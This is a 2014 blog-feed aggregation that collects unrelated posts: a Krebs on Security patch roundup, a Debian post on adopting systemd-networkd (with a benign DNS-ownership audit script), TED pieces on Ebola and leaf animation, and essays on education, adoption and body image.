    The children’s enthusiasm, their willingness to learn and their appreciation of my involvement as a granny. Recently, I’ve been experiencing some heart problems and when I re-started the sessions after my illness, the children at one of the schools had made these lovely “Get Well Soon” cards for me, which they were able to show to me during one of our sessions. What a tonic that was! And, unlike some of the children in England, when they see you, they smile. They are happy to be there. And they have a contagious enthusiasm, which I think is what keeps me going and makes me want to do more for them.

    What do you think makes a good teacher?

    Teaching is about creating and providing a supportive environment in which a child can learn. A good teacher acts as a facilitator for that child’s learning. The UK government started fiddling around with education, and that’s one of the things that drove me away from teaching – we moved to a very prescribed curriculum with little or no time to drift sideways and explore other facets of a subject or respond to students’ questions or thoughts. The school’s examination results became the most important thing, but it’s much more than that! Overall, I think a good teacher must be able to work within the constraints of the existing system, have an enthusiasm for their subject, and be able to engage students and get them involved with their own learning.

    What do you think is the future of learning?

    The use of technology in schools is changing the way we learn, what we learn, and what the shape of the curriculum should be in the future. I was a teacher during an era when computers first appeared in schools — to be used by teachers, certainly not for students. Now in many schools, the students all have their own computers or tablets. I never envisaged being able to communicate with a school in India on a regular basis, and now look what I am doing! Technology opens up many opportunities for different approaches to learning. Within this, children need to be allowed to take more charge of their learning, with the teacher acting in a more supporting role. Letting go, allowing this to happen, is a big challenge for teachers, as there is security when you are setting out the agenda. But really, this approach doesn’t take anything away from the role of the teacher. We will continue to be instrumental in setting up these learning situations.

    Learn more about becoming a Skype Granny »

    Find out more about Sugata Mitra’s TED Prize wish »


    Krebs on Security: Microsoft, Adobe Push Critical Security Fixes

    Adobe, Microsoft and Oracle each released updates today to plug critical security holes in their products. Adobe released patches for its Flash Player and Adobe AIR software. A patch from Oracle fixes at least 25 flaws in Java. And Microsoft pushed patches to fix at least two-dozen vulnerabilities in a number of Windows components, including Office, Internet Explorer and .NET. One of the updates addresses a zero-day flaw that reportedly is already being exploited in active cyber espionage attacks.

    Earlier today, iSight Partners released research on a threat the company has dubbed “Sandworm” that exploits one of the vulnerabilities being patched today (CVE-2014-4114). iSight said it discovered that Russian hackers have been conducting cyber espionage campaigns using the flaw, which is apparently present in every supported version of Windows. The New York Times carried a story today about the extent of the attacks against this flaw.

    In its advisory on the zero-day vulnerability, Microsoft said the bug could allow remote code execution if a user opens a specially crafted malicious Microsoft Office document. According to iSight, the flaw was used in targeted email attacks against NATO, Ukrainian and Western government organizations, and firms in the energy sector.

    More than half of the other vulnerabilities fixed in this month’s patch batch address flaws in Internet Explorer. Additional details about the individual Microsoft patches released today are available at this link.

    Separately, Adobe issued its usual round of updates for its Flash Player and AIR products. The patches plug at least three distinct security holes in these products. Adobe says it’s not aware of any active attacks against these vulnerabilities. Updates are available for Windows, Mac and Linux versions of Flash.

    Adobe says users of the Adobe Flash Player desktop runtime for Windows and Macintosh should update to Adobe Flash Player 15.0.0.189. To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash, although my installation of Chrome says it is up-to-date and yet is still running v. 15.0.0.152 (with no outstanding updates available, and no word yet from Chrome about when the fix might be available).

    The most recent versions of Flash are available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here.

    Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera). If you have Adobe AIR installed, you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15.0.0.293 for Windows, Mac, and Android.

    Finally, Oracle is releasing an update for its Java software today that corrects more than two-dozen security flaws in the software. Oracle says 22 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without the need for a username and password. Java SE 8 updates are available here; the latest version of Java SE 7 is here.

    If you really need and use Java for specific Web sites or applications, take a few minutes to update this software. Updates are available from Java.com or via the Java Control Panel. I don’t have an installation of Java handy on the machine I’m using to compose this post, but keep in mind that updating via the control panel may auto-select the installation of third-party software, so de-select that if you don’t want the added crapware.

    Otherwise, seriously consider removing Java altogether. I’ve long urged end users to junk Java unless they have a specific use for it (this advice does not scale for businesses, which often have legacy and custom applications that rely on Java). This widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

    If you have an affirmative use or need for Java, unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play). The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

    For Java power users — or for those who are having trouble upgrading or removing a stubborn older version — I recommend JavaRa, which can assist in repairing or removing Java when other methods fail (requires the Microsoft .NET Framework, which also received updates today from Microsoft).

    Planet Debian: Joachim Breitner: Switching to systemd-networkd

    Ever since I read about systemd-networkd being in the making I was looking forward to trying it out. I kept watching for the package to appear in Debian, or at least ITP bugs. A few days ago, by accident, I noticed that I already have systemd-networkd on my machine: It is simply shipped with the systemd package!

    My previous setup was a combination of ifplugd to detect when I plug or unplug the ethernet cable with a plain DHCP entry in /etc/network/interfaces. A while ago I was using guessnet to do a static setup depending on where I am, but I don’t need this flexibility any more, so the very simple approach with systemd-networkd is just fine with me. So after stopping ifplugd and

    $ cat > /etc/systemd/network/eth.network <<__END__
    [Match]
    Name=eth0
    [Network]
    DHCP=yes
    __END__
    $ systemctl enable systemd-networkd
    $ systemctl start systemd-networkd

    I was ready to go. Indeed, systemd-networkd, probably due to the integrated dhcp client, felt quite a bit faster than the old setup. And what’s more important (and my main motivation for the switch): It did the right thing when I put it to sleep in my office, unplug it there, go home, plug it in and wake it up. ifplugd failed to detect this change and I often had to manually run ifdown eth0 && ifup eth0; this now works.

    But then I was bitten by what I guess some people call the viral nature of systemd: systemd-networkd would not update /etc/resolv.conf, but rather relies on systemd-resolved. And that requires me to change /etc/resolv.conf to be a symlink to /run/systemd/resolve/resolv.conf. But of course I also use my wireless adapter, which, at that point, was still managed using ifupdown, which would use dhclient which updates /etc/resolv.conf directly.

    So I investigated if I can use systemd-networkd also for my wireless account. I am not using NetworkManager or the like, but rather keep wpa_supplicant running in roaming mode, controlled from ifupdown (not sure how that exactly works and what controls what, but it worked). I found out that this setup works just fine with systemd-networkd: I start wpa_supplicant with this service file (which I found in the wpasupplicant repo, but not yet in the Debian package):

    [Unit]
    Description=WPA supplicant daemon (interface-specific version)
    Requires=sys-subsystem-net-devices-%i.device
    After=sys-subsystem-net-devices-%i.device
    
    [Service]
    Type=simple
    ExecStart=/sbin/wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant-%I.conf -i%I
    
    [Install]
    Alias=multi-user.target.wants/wpa_supplicant@%i.service

    Then wpa_supplicant will get the interface up and down as it goes, while systemd-networkd, equipped with

    [Match]
    Name=wlan0
    [Network]
    DHCP=yes

    does the rest.

    So suddenly I have a system without /etc/init.d/networking and without ifup. Feels a bit strange, but also makes sense. I still need to migrate how I manage my UMTS modem device to that model.

    The only thing that I’m missing so far is a way to trigger actions when the network configuration has changed, like I could with /etc/network/if-up.d/ etc. I want to run things like killall -ALRM tincd and exim -qf. If you know how to do that, please tell me, or answer over at Stack Exchange.
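The half-migrated state this post passes through (one interface on systemd-networkd, another still on ifupdown, each with its own idea of who writes resolv.conf) can be checked mechanically. The script below is an added example, not code from the post or from systemd; the function names, the root-prefix argument and the constructed sample tree are assumptions for illustration, and it relies on `mktemp` and `readlink` being available.

```shell
#!/bin/sh
# Added example: audit which tool owns DHCP and DNS on a host that mixes
# ifupdown and systemd-networkd. Every function takes a root prefix so the
# check can run against a test tree; pass "" to inspect the live system.

# Interface names from .network files whose [Network] section enables DHCP.
# Name= may be a glob (e.g. en*); it is reported as written, not expanded.
networkd_dhcp_ifaces() {
    for f in "$1"/etc/systemd/network/*.network; do
        [ -f "$f" ] || continue
        awk '
            /^[ \t]*\[/ { gsub(/[ \t]/, ""); section = $0; next }
            {
                split($0, kv, "=")
                key = kv[1]; val = kv[2]
                gsub(/[ \t]/, "", key); gsub(/[ \t]/, "", val)
            }
            section == "[Match]"   && key == "Name" { name = val }
            section == "[Network]" && key == "DHCP" &&
                val ~ /^(yes|true|ipv4|ipv6)$/      { dhcp = 1 }
            END { if (dhcp && name != "") print name }
        ' "$f"
    done
    return 0
}

# Interfaces that ifupdown still configures with "inet dhcp".
ifupdown_dhcp_ifaces() {
    [ -f "$1/etc/network/interfaces" ] || return 0
    awk '$1 == "iface" && $3 == "inet" && $4 == "dhcp" { print $2 }' \
        "$1/etc/network/interfaces"
}

# Classify /etc/resolv.conf: resolved | symlink:<target> | file | missing.
resolv_conf_owner() {
    f=$1/etc/resolv.conf
    if [ -L "$f" ]; then
        target=$(readlink "$f")
        case $target in
            */run/systemd/resolve/resolv.conf) echo resolved ;;
            *) echo "symlink:$target" ;;
        esac
    elif [ -f "$f" ]; then
        echo file
    else
        echo missing
    fi
}

# Returns 0 when DHCP and DNS have a single owner, 1 otherwise.
audit_dns_ownership() {
    nd=$(networkd_dhcp_ifaces "$1" | tr '\n' ' ')
    iu=$(ifupdown_dhcp_ifaces "$1" | tr '\n' ' ')
    owner=$(resolv_conf_owner "$1")
    rc=0
    set -f    # do not let a glob in Name= expand against the working directory
    for i in $nd; do
        for j in $iu; do
            if [ "$i" = "$j" ]; then
                echo "CONFLICT: $i has DHCP configured in both ifupdown and systemd-networkd"
                rc=1
            fi
        done
    done
    set +f
    if [ -n "$nd" ] && [ "$owner" != resolved ]; then
        echo "WARN: networkd runs DHCP on: $nd but /etc/resolv.conf is '$owner', not a symlink to systemd-resolved's file"
        rc=1
    fi
    if [ -n "$iu" ] && [ "$owner" = resolved ]; then
        echo "WARN: ifupdown runs DHCP on: $iu and its client updates /etc/resolv.conf directly, bypassing systemd-resolved"
        rc=1
    fi
    [ "$rc" -eq 0 ] && echo "OK: one owner for DHCP and DNS (resolv.conf: $owner)"
    return "$rc"
}

# Constructed sample tree: eth0 on networkd, wlan0 still on ifupdown,
# resolv.conf a regular file (192.0.2.53 is a documentation address).
make_sample_tree() {
    t=$(mktemp -d) || return 1
    mkdir -p "$t/etc/systemd/network" "$t/etc/network"
    printf '%s\n' '[Match]' 'Name=eth0' '[Network]' 'DHCP=yes' \
        > "$t/etc/systemd/network/eth.network"
    printf '%s\n' 'auto lo' 'iface lo inet loopback' 'iface wlan0 inet dhcp' \
        > "$t/etc/network/interfaces"
    echo 'nameserver 192.0.2.53' > "$t/etc/resolv.conf"
    echo "$t"
}

# Demo run on the constructed tree; the audit is expected to warn here.
demo_root=$(make_sample_tree)
audit_dns_ownership "$demo_root" || true
rm -rf "$demo_root"
```

Run as `audit_dns_ownership ""` on a real machine, a non-zero exit means two tools can still rewrite the resolver configuration, which is worth knowing before trusting the DNS servers listed there.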

    Rondam Ramblings: Parallel universes and the arrow of time

    In a previous post about quantum mechanics and parallel universes I ended with a puzzle: All measurements are in principle reversible. Imagine that we could actually carry out this program of undoing the myriad entanglements that constitute your making a particular observation. What would be the subjective sensation, i.e. what would it "feel like" if this were done to you? If you haven't read

    Planet Debian: Gunnar Wolf: When Open Access meets the Napster anniversary

    Two causally unrelated events which fit in together in the greater scheme of things ;-)

    In some areas, the world is better aligning to what we have been seeking for many years. In some, of course, it is not.

    In this case, today I found our article on the Network of Digital Repositories for our University, in the Revista Digital Universitaria [en línea] was published. We were invited to prepare an article on this topic because this month's magazine would be devoted to Open Access in Mexico and Latin America — This, because a law was recently passed that makes conditions much more interesting for the nonrestricted publication of academic research. Of course, there is still a long way to go, but this clearly is a step in the right direction.

    On the other hand, after a long time of not looking in that direction (even though it's a lovely magazine), I found that this edition of FirstMonday takes as its main topic Napster, 15 years on: Rethinking digital music distribution.

    I know that nonrestricted academic publishing via open access and nonauthorized music sharing via Napster are two very different topics. However, there is a continuous push and trend towards considering and accepting open licensing terms, and they are both points in the same struggle. An interesting data point to add is that, although many different free licenses have existed over time, Creative Commons (which gave a lot of visibility and made the discussion within the reach of many content creators) was created in 2001 — 13 years ago today, two years after Napster. And, yes, there are no absolute coincidences.

    Geek Feminism: All about my linkspam (14 October 2014)

    #GamerGate

    A few more links about the Grace Hopper Celebration Ally Panel


    We link to a variety of sources, some of which are personal blogs.  If you visit other sites linked herein, we ask that you respect the commenting policy and individual culture of those sites.

    You can suggest links for future linkspams in comments here, or by using the “geekfeminism” tag on Pinboard, Delicious or Diigo; or the “#geekfeminism” tag on Twitter. Please note that we tend to stick to publishing recent links (from the last month or so).

    Thanks to everyone who suggested links.

    Planet Debian: Marco d'Itri: The Italian peering ecosystem

    I published the slides of my talk "An introduction to peering in Italy - Interconnections among the Italian networks" that I presented today at the MIX-IT (the Milano internet exchange) technical meeting.

    TED: “National boundaries are not respected by infectious diseases”: A Q&A on the Ebola epidemic at TEDGlobal 2014

    Chikwe Ihekweazu in a fascinating Q&A about the Ebola epidemic at TEDGlobal 2014. Photo: Ryan Lash/TED

    Ten years ago, epidemiologist Chikwe Ihekweazu helped fight an outbreak in South Sudan. This TED Fellow now runs the health consultancy EpiAFRIC, writes about public health issues in his native Nigeria, and is soon to start a four-week rotation on the ground fighting the Ebola epidemic. So as the outbreak continues, he sat down for a Q&A with Chris Anderson in Session 11 to give insights into what is happening and how concerned we all should be.

    The first question: Can we get the scientific overview of what Ebola is and how it makes people sick?

    Ihekweazu gives the disconcerting answer that, unlike some other viruses, we don’t know what the natural host is for Ebola. We do, however, know that in humans it is passed through contact with bodily fluids. We know that the disease has an incubation period of 2 to 21 days and that, unlike many other viruses, you can’t actually transmit the virus unless you are ill. “Most outbreaks are relatively small,” says Ihekweazu. In the South Sudan outbreak he helped fight a decade ago, there were fewer than 30 cases.

    This time around, things are much worse. As of this moment, there have been close to 8,000 cases and 4,000 deaths. “This is really the worst outbreak we’ve ever dealt with — there’s really been nothing close,” says Ihekweazu. Public health advocates have one main tactic from here: to stop the chain of transmission from one sick person to another. Those most at risk for infection are family members of those already infected, health care workers and people involved in funeral rites.

    The difficulty of fighting the Ebola epidemic in Africa connects to larger currents on the global stage. To illustrate this, Ihekweazu shows us two highly distorted maps of the world. The first illustrates the global deaths from infectious diseases — in this map, Africa and India are severely bloated, while the Americas appear as just a sliver. The next map shows public health spending in the world — here, the United States and Europe appear gigantic, while Africa becomes a thin line. Ihekweazu drops the shocking fact that there is one doctor to every 100,000 people in Liberia. “For Ebola to cause an outbreak, it probably picked the best two or three countries to happen in,” he says.

    Ihekweazu says that he learned some important lessons in South Sudan that will be helpful this time around. For example, that the stark remoteness of isolation wards is a problem. “If you come to a place like this, it’s likely that you’re going to die there,” says Ihekweazu. “The cycle of anxiety keeps people away and keeps the outbreak spreading, because people stay home and infect their loved ones.” A big challenge now is convincing people to trust local hospitals in which they have “little confidence.”

    But there is a success story: the containment of Ebola in Lagos, Nigeria. When the first case of Ebola cropped up there, it spread to 13 people quickly. But then the spread stopped. An Ebola response center was quickly spun up.

    Thousands of people who’d had contact with patients were contacted and monitored carefully. It worked — there have only been 8 cases since.

    Anderson’s next question for Ihekweazu: At this late stage, can the world get this under control?

    “It can go either way. We could see a plateau in the next few months — which we hope for — or we could see a radical escalation,” says Ihekweazu. “It really depends on what we do in the next few weeks.”

    He feels encouraged as he sees the international community rallying to support the countries most affected by Ebola. “This is a challenge for our common global community — not just a problem for Liberia and Sierra Leone,” he says. “Whether it’s influenza in Mexico, or SARS in Hong Kong, or Ebola in Liberia, the boundaries we hold so dear are not respected by infectious diseases.”

    In Africa especially, governments need to step up. Ihekweazu points out that many hospitals and schools operate without running water, something he says is unacceptable. “How do we mobilize resources to deal with health, education, justice systems, to keep pace with development we’re seeing driven by the private sector across Africa?” he says. “We have a large economy, but it’s all private sector. Our public sector needs to step up.”

    The final question: What can people do to help?

    Ihekweazu stresses two things. First, that people support governments that are giving resources to fight this epidemic. And second, that they give money directly to Médecins Sans Frontières, or Doctors without Borders. “They know what to do — they’ve done it for years,” he says.


    TED: An animated lesson full of adorable animals made of autumn leaves

    Ten percent of plant matter gets eaten while it is alive. The other 90% falls to the ground and becomes detritus, which supports microbes, insects and, yes, us, as we feed on animals that grazed on it and plants that grow in it.

    When it came time to animate a TED-Ed lesson about this so-called “brown food chain,” the animation team of Celeste Lai, Lisa LaBracio and Biljana Labovic had an idea. LaBracio had a vast collection of dried leaves at home, and the trio conspired to create animals by layering these leaves into a visual representation of the idea that all living things are made up of dead matter.

    “I’ve had a collection of dried leaves and flowers since I was 8 or 9,” says LaBracio, who designed the backgrounds and animated the video. “I hunted for fallen leaves in my backyard and rescued dying bouquets to press between book pages. I’ve always found it fascinating that you can freeze a moment in time this way — and I’m taken with the different colors and patterns that emerge depending on how long a leaf has been on the ground. It’s pretty hard to get anywhere with me during the fall; I’m looking at the ground constantly, stopping every few seconds to grab something.”

    In the lesson above, these leaves become an owl, a fish, a grasshopper, a deer, a lion and a cow in a pasture. Lai, who was the character designer, says that she thoroughly enjoyed the puzzle of creating these animals out of LaBracio’s leaves.

    “The lion was the most fun to design. When I realized I could use pressed sunflower petals as the mane, I was ecstatic. Those shapes fit right into the animal design perfectly,” says Lai. “That magic also happened with the tail. I didn’t have to modify the leaf much — it just fit right in!”

    The hardest animal to create? That fish, says Lai. “It’s one of the simplest designs, but because a fish is shaped a lot like a leaf, finding the perfect one was hard,” she says. “I went through a few different designs with bigger or smaller leaves. But when I found the right leaf it became so simple.”

    For Labovic, who directed the lesson, the surprise was how well things fell into place once they’d picked their medium. “For every lesson, we try to challenge ourselves with something new — whether that be in the design or in the animation process,” she says. “At first, my idea was to use just the textures from the leaves, but when Lisa showed me a few little birds she had crafted from multiple leaves years before, I realized we could use 2-D puppet animation to bring the leaves to life.”

    LaBracio admits that she keeps many collections, some of which do come in handy for TED-Ed animations. “Many of Biljana’s and my collaborations feature things I ‘just have lying around.’ Recently, when we were making a video about honeybees, I remember saying, ‘Aww, man! I just threw out a bag of dead honeybees!’” she says. “Admittedly, my love of stop-motion animation has long justified my collecting. As a child, I loved showing my mom that there was a purpose to my jars of buttons and drawers of fabric scraps. And this project was a gift because it finally motivated me to digitally archive my favorite — and largest — collection.”

     For more unique animations, check out TED-Ed lessons »


    Racialicious: Who’s Your Mama?: Race, Sexuality, and the Adoptive Mother [Academic Essay]

    by Guest Contributor Sara M. Erdmann, MFA, PhD

    The image of the American adoptive mother has emerged gradually since adoption’s inception in 1851, but it has always existed within a racialized and heteronormative context (“Massachusetts Adoption of Children Act, 1851”).

    According to the American adoption narrative, adoptive mothers are white, heterosexual women; their decision to adopt a child is an act of goodwill, and, in cases of transracial adoption, even a badge of racial acceptance.

    This particular adoptive mother has become an accepted, albeit marginalized, part of mothering culture and is the one for whom books are written, organizations formed, and resources developed. This adoptive mother has defined the adoptive mother identity in modern America and become one of many voices within the larger motherhood narrative.

    Yet, research confirms that white, heterosexual women are not the only ones adopting children: many Black and queer (*) non-biological children, but, save for mentions in a few isolated academic texts, their experiences are almost entirely absent from the larger adoption narrative.

    Racism and homophobia are immediately identifiable causes of such exclusion: the powers of prejudice have an incalculable impact on the conversation surrounding non-biological motherhood. Indeed, the somewhat greater presence of Black and queer mothers in the blogosphere reinforces the fact that the elimination of mainstream publishing gatekeepers leads to an increase in diverse stories of motherhood.

    Still, while prejudice has led to innumerable obstacles for these two marginalized groups, it alone does not explain the relative dearth of print and online literature surrounding Black and queer adoptive motherhood. In fact, it is in part due to the history of these two groups and their engagement in non-normative forms of motherhood that they are less visible and remain largely absent from discussions of modern adoptive motherhood.

    The community othermother has been recognized in African-American communities as an essential player in childrearing since the institution of slavery. In her essay “Mothering: A possible Black feminist link to social transformation?”, social scientist Stanlie M. James defines othermothers as “the women in African-American communities who assist blood mothers in the responsibilities in child care for short to long-term periods, in informal or formal arrangements” (45).

    While othermothers don’t have legal custody of the children they care for, it is impossible to quantify their level of commitment toward the children in their lives. In contrast to the biocentric views of parenthood prioritized in the white, heterosexual community, the informal adoption of non-biological children expands the “network of fictive kin” common within the Black community (James 45).

    Patricia Hill Collins, author of Black Feminist Thought, acknowledges that, while “grandmothers, sisters, aunts, and cousins” are among those who act as othermothers, many othermothers have no blood relationship with the children they care for (178). None of the othermothers Collins describes pursue legal adoption, nor do they intend to be permanent replacements for a child’s birth mother, which makes this “informal adoption” of “needy” or “orphaned” children difficult for western culture to understand (Collins 181). In the Black community, necessity and a shared sense of responsibility have made othermothers central to the raising of children, as they have allowed for children whose mothers were unable or unwilling to care for them fully to be fed, clothed, and educated without having to leave their community or sever ties to their biological mothers.

    This concept of children having more than one mother challenges the “one mother per child”, or monomaternalistic, mentality so rooted in American culture (Park 6). James observes that, “while western conceptualizations of mothering have often been limited to the activities of females with their biological offsprings,” a view that biologically prohibits co-mothering, “mothering within the Afro American community and the Black diaspora can be viewed as a form of cultural work” (44).

    What James describes—this view of mothering as cultural work—explicitly challenges biocentrism and further ensures that a child’s needs are being met within their own community.

    Indeed, Black othermothering is so prevalent that “young women are often groomed at an early age to become othermothers” (Collins), suggesting an expectation that the majority of women will take on some othermothering duties in their lifetime. Thus, the long-standing practice of African American othermothering has led Black women to view even traditional adoption and fostering differently and remains one of the fundamental reasons that Black women are largely absent in modern discussions of adoption.

    In her essay “Ain’t I a Mommy?,” Deesha Philyaw addresses the lack of Black voices in American motherhood narratives. Philyaw acknowledges racism’s substantive role, but also concedes that Black women may not be writing about motherhood in the same numbers in the first place: “If black women haven’t beaten down publishers’ doors with manuscripts about mothering or about pulling second shifts,” she writes, “it’s probably because this is what we’ve always done, without fanfare and without the luxury of ‘what about the children?’ pearl-clutching” (Philyaw).

    In other words, the market for Black motherhood memoirs is small in part because Black women either can’t or won’t buy into the guilt and angst that underlies most motherhood narratives. Simply put, Black women have been multitasking, working and raising their kids (and often other people’s kids as well) for hundreds of years, and they haven’t had the privilege of worrying (or writing) about the long term impact of their every decision.

    This causation can be broadened to include Black adoptive motherhood as well.

    Thorough research makes clear that there is very little concrete data surrounding black adoptive motherhood, so it’s difficult to know how many women’s experiences are being ignored by such a narrow focus, but blogger Adoptive Black Mom, author of an insightful yet rare blog on Black adoptive mothering, admits to feeling dismayed by “how few People of Color I see in adoption promotional media. We’re out here, but I think that the privilege of race frequently marginalizes us out of the adoption narrative” (“Privilege, Adoption, and Melissa Harris-Perry,” par. 17).

    In a community so accustomed to the work of raising one another’s children, the media and literary attention surrounding adoptive motherhood may not resonate in the same way with Black women.

    To write a memoir or create a formal organization geared toward adoptive mothering would suggest that one considers it a novel experience, when the communal act of child raising is so embedded in many African American communities that such formality is mystifying.

    Like Black othermothers, queer othermothers have been vital to childrearing, despite their relative invisibility within the larger adoption narrative. In fact, the history of their crucial but undocumented role has similarly contributed to their absence within the conversation surrounding adoption. In her anthology, Confessions of the Other Mother: Non-Biological Lesbian Moms Tell All, queer journalist Kathy Paige defines othermother as the non-biological co-mother who may or may not have legal custody over her child.

    Historically, before the increasing availability of assisted reproductive technology (ART) in the 1990s allowed women to become pregnant without engaging in heterosexual sex, queer othermothers have had great investment in remaining invisible. Their invisibility was critical to queer biological mothers maintaining custody of their children during the second half of the twentieth century, as husbands and biological fathers could use a mother’s sexuality as justification for taking her children away (“Milestones in LGBT Parenting History”).

    While ART has allowed legally single women to become pregnant and has greatly lessened fear of losing custody to a male partner, the vast majority of states still deny queer women the right to marry and co-adopt, leaving them without even basic parental rights over children they raise from birth.

    Rather than receiving the legitimacy afforded to heterosexual adoptive mothers by legal and social systems already in place, queer othermothers are often viewed as outsiders or helpers, more like aunts than mothers, and this difference is reinforced by the fact that, like African American othermothers, they usually carry “no legal maternal status” (Park 79).

    Even in the most progressive of states, queer othermothers are required to spend thousands of dollars to legally adopt the children they planned for and their partners delivered, essentially becoming adoptive mothers even if they are married or partnered with the child’s birth mother for years prior to conception. Again, queer othermothers’ stories simply aren’t told within the adoptive community.

    Of course, unlike Black othermothers, queer othermothers don’t step in only to fill a gap in a child’s life. They aren’t there to provide services that a biological mother cannot or will not, nor is their place in their child’s life dependent on fluctuating needs.

    But it would be naïve to ignore the fact that all children gain different things from each parent, and that each parent acts in ways that complement another in hopes that all a child’s needs are met when all parents are considered. Furthermore, Black and queer othermothers share key characteristics: they challenge monomaternalism and reinforce the fact that children can and do thrive under the care of multiple mothers. They are also similarly disadvantaged by a society that prioritizes biological motherhood.

    And, unlike in cases of traditional adoption, neither Black nor queer othermothers compromise the biological mother’s place in their child’s life. The fact that Black and queer othermothers have for so long existed outside of “legal maternity” and have grown accustomed to being considered “secondary” parents provides partial explanation for their absence in conversations surrounding adoptive motherhood.

    Of course, even white, heterosexually married, middle-class adoptive mothers face challenges in their efforts to become a part of the motherhood narrative. Adoptive Black Mom allows that, “there’s just some stuff on this adoption journey that I think privilege can’t buffer. Make that a lot of stuff” (“Privilege, Adoption, and Melissa Harris-Perry,” par. 16).

    Our society’s dependence on biocentric visions of motherhood has long placed adoptive mothers on the periphery of maternity regardless of their race or sexuality. In her book Mothering Queerly, Queering Motherhood, Shelly M. Park explains that, “like light-skinned blacks or closeted queers, adoptive mothers know that we are ‘passing’” (24). Adoptive motherhood contradicts biocentrism, and adoption, Park concedes, “is [still] considered a ‘second-best’ solution to the problem of discovered infertility” (61). Still, this imperfect place on the “borderlands of maternity” (58) remains a visible one, largely unavailable to Black and/or queer women. These white, heterosexual adoptive mothers’ voices, while marginalized, are still heard.

    Writing is an act of resistance and activism, and it provides an outlet through which many white, heterosexual mothers might be able to share their stories. But for many Black women dealing with the profound inequalities of a racist society, “survival is a form of resistance” (Collins, 200). For Queer women, being called “mama” by their adopted child is activism. Books and blogs on Black and queer adoptive motherhood may never arrive in substantial numbers, both because of the silencing effects of racism and homophobia and also because the widespread history of othermotherhood has lessened its novelty, even to those involved in it.

    Lest it appear that the experiences of Black and queer women can be conflated, it’s important to distinguish between Black othermothers, who generally seek no legal rights, and queer othermothers, who often place great value on legal reinforcement of their parenthood in the rare cases where it’s available. Of course, Black, queer women face compounded struggles as mothers, othermothers, and adoptive mothers, and they have their own unique stories to tell. But both Black and queer othermothers aim to serve as additional, rather than replacement, mothers; both challenge the biocentric and monomaternal vision of motherhood, and also the racialized and heteronormative visions of adoptive motherhood.

    The history of othermothering in Black and queer communities does not justify the absence of Black and queer adoptive mothers within the larger adoption narrative. Rather, it serves to complicate the understanding of their absence.

    The media plays a profound role in raising awareness of the struggles of marginalized groups, and whether it be access to social services that allow children to remain with othermothers within their community or affordable access to legal adoption for queer othermothers, giving othermothers and non-normative adoptive mothers a voice will increase the safety and stability of adoptive families everywhere.

    Sara Erdmann earned her PhD in literature and creative writing in 2013. She teaches English at an all-girls boarding school in Connecticut, where she writes fiction and reads obsessively about issues affecting women worldwide. You can follow her on Twitter at @smerdmann.

    Works Cited

    Collins, Patricia Hill. Black Feminist Thought: Knowledge, Consciousness, and the Politics of Empowerment. City: Publisher, Year. Print.

    “Massachusetts Adoption of Children Act, 1851.” The Adoption History Project. University of Oregon, 2012. Web. 18 March 2014. http://pages.uoregon.edu/adoption/archive/MassACA.htm

    “Milestones in LGBT Parenting History.” Mombian.com, 2014. Web. 18 March 2014. http://www.mombian.com/2012/10/30/milestones-in-lgbt-parenting-history/

    Paige, Kathy. Confessions of the Other Mother: Non-Biological Lesbian Moms Tell All.

    Park, Shelley M. Mothering Queerly, Queering Motherhood. City: SUNY Press, 2014. Print.

    James, Stanlie M. “Mothering: A possible Black feminist link to social transformation?” Theorizing Black Feminisms: The Visionary Pragmatism of Black Women. Ed. Stanlie M. James and Abena P. A. Busia. City: Routledge, 1993. Ppgs. Print.

    The post Who’s Your Mama?: Race, Sexuality, and the Adoptive Mother [Academic Essay] appeared first on Racialicious - the intersection of race and pop culture.

    Sociological Images10 Honest Thoughts on Being Loved by a Skinny Boy

    Today is Love Your Body Day and this is our favorite body positive post of the year, re-posted in celebration.

    Rachel Wiley delivers a provocative poem about her experience as a “fat girl” loved by a skinny boy.  My favorite part:

    My college theater professor once told me
    that despite my talent,
    I would never be cast as a romantic lead.
    We put on shows that involve flying children and singing animals
    but apparently no one
    has enough willing suspension of disbelief
    to buy anyone loving a fat girl.

    Watch the whole thing (transcript here):

    [Video: //www.youtube.com/v/tRFOTqTicvY?version=3&hl=en_US]

    If you liked, we also recommend Kara Kamos’ confession that she’s ugly, but can’t think of a good reason to care.  Hat tip to Polly’s Pocket.

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at http://thesocietypages.org/socimages)

    Sociological ImagesLove Your Body Day: Hall of Fame and Shame

    It’s Love Your Body day!  Below is a Hall of Fame and a Hall of Shame.  The second set of posts reveal just what we’re up against, but the first set is a salve, a celebration of all of our beautifully diverse and interesting bodies.

    You choose what will amp you up today,  but don’t miss this year’s SocImages Pick: Rachel Wiley offers 10 Honest Thoughts About Being Loved by a Skinny Boy.

    The Hall of Fame

    Disability
    Body Types
    Gender
    Race/Ethnicity/Color

    The Hall of Shame

    Body Types
    Hair
    Transsexuality
    Heightism
    Disability

     

    Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

    (View original at http://thesocietypages.org/socimages)

    Racialicious#GIA14: Journalism as Public + Art

    I’m on the road still – currently in Houston at the Grantmakers in the Arts 2014 Conference in Houston, Texas. This year’s conference will focus on grantmaking, race, and social justice, so I will be blogging from the conference for the next few days about issues pertinent to artists of color.

    I’m speaking at the Monday morning plenary, on how the future of journalism is looking more and more like public art. Here’s a cleaned up version of my talk. – LDP

    What is the future of journalism? The increasingly terrifying answer is that no one truly knows – in a time of budget cuts and a shifting media environment, it would be all too simple to despair. But in times of great turmoil we see some of the greatest forms of inspiration. In the media world, we are beginning to redefine what journalism is and what journalism can be. What is journalism, but a way of informing the public? What is art, but the expression of ideas made public? And what happens when the walls between the two start to fall?

